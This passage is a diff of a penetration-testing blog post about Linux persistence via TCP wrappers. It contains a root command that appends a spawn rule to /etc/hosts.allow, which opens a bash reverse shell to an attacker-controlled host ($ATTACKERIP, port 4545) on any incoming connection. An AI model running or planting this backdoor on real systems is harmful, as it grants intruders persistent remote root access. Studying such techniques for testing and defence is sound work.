faisalfs10x/faisalfs10x.github.io/_posts/VAPT/2021-05-10-linux-persistence.md

 -   ***/etc/hosts.allow***
 -   ***/etc/hosts.deny***

 These files are used to determine whether or not a client may connect to a network service on a remote host.
+As for PoC, if someone connect to any port on target machine such as SSH, reverse shell will be spawned to adversary server.

 	$ Command:

 	root@victim$ echo -e "Creating TCP wrapper\nALL: ALL: spawn (bash -c '/bin/bash -i >& /dev/tcp/$ATTACKERIP/4545 0>&1') & :allow" >> /etc/hosts.allow

-If someone connect to any port on target machine such as SSH, reverse shell will be spawned to adversary server.

 ## Reference